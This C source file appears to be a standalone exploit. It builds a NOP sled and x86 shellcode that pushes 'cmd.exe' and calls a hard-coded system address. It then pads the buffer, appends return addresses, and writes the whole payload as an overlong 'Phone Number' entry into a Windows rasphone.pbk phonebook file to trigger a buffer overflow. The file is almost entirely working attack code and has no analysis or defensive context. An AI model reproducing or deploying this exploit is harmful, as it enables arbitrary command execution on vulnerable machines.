
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int FILE ;


 int * fopen (char*,char*) ;
 int fprintf (int *,char*,...) ;
 int printf (char*,...) ;

int main (int argc, char *argv[])
{
        FILE *fd;
        int count=0;
        char buffer[1024];



        while (count < 37)
                {
                        buffer[count]=0x90;
                        count ++;
                }




        buffer[37]=0x8B;
        buffer[38]=0xE5;


        buffer[39]=0x55;


        buffer[40]=0x8B;
        buffer[41]=0xEC;




        buffer[42]=0x33;
        buffer[43]=0xFF;



        buffer[44]=0x90;


        buffer[45]=0x57;


        buffer[46]=0x83;
        buffer[47]=0xEC;
        buffer[48]=0x04;
        buffer[49]=0xC6;
        buffer[50]=0x45;
        buffer[51]=0xF8;
        buffer[52]=0x63;



        buffer[53]=0xC6;
        buffer[54]=0x45;
        buffer[55]=0xF9;
        buffer[56]=0x6D;



        buffer[57]=0xC6;
        buffer[58]=0x45;
        buffer[59]=0xFA;
        buffer[60]=0x64;



        buffer[61]=0xC6;
        buffer[62]=0x45;
        buffer[63]=0xFB;
        buffer[64]=0x2E;



        buffer[65]=0xC6;
        buffer[66]=0x45;
        buffer[67]=0xFC;
        buffer[68]=0x65;



        buffer[69]=0xC6;
        buffer[70]=0x45;
        buffer[71]=0xFD;
        buffer[72]=0x78;




        buffer[73]=0xC6;
        buffer[74]=0x45;
        buffer[75]=0xFE;
        buffer[76]=0x65;






        buffer[77]=0xB8;
        buffer[78]=0xC3;
        buffer[79]=0x08;
        buffer[80]=0x02;
        buffer[81]=0x78;



        buffer[82]=0x50;



        buffer[83]=0x8D;
        buffer[84]=0x45;
        buffer[85]=0xF8;



        buffer[86]=0x50;




        buffer[87]=0xFF;
        buffer[88]=0x55;
        buffer[89]=0xF4;


        count = 90;
        while (count < 291)
                {
                        buffer[count]=0x90;
                        count ++;
                }




        buffer[291]=0x24;
        buffer[292]=0xF1;
        buffer[293]=0x5D;
        buffer[294]=0x01;


        buffer[295]=0x26;
        buffer[296]=0xF1;
        buffer[297]=0x5D;
        buffer[298]=0x01;
        buffer[299]=0x00;
        buffer[300]=0x00;


        printf("%s", buffer);


        fd = fopen("rasphone.pbk", "w");

        if(fd == ((void*)0))
                {
                        printf("Operation failed\n");
                        return 0;
                }

        else
                {
                        fprintf(fd,"[Internet]\n");
                        fprintf(fd,"Phone Number=");
                        fprintf(fd,"%s",buffer);
                        fprintf(fd,"\n");
                }
return 0;
}
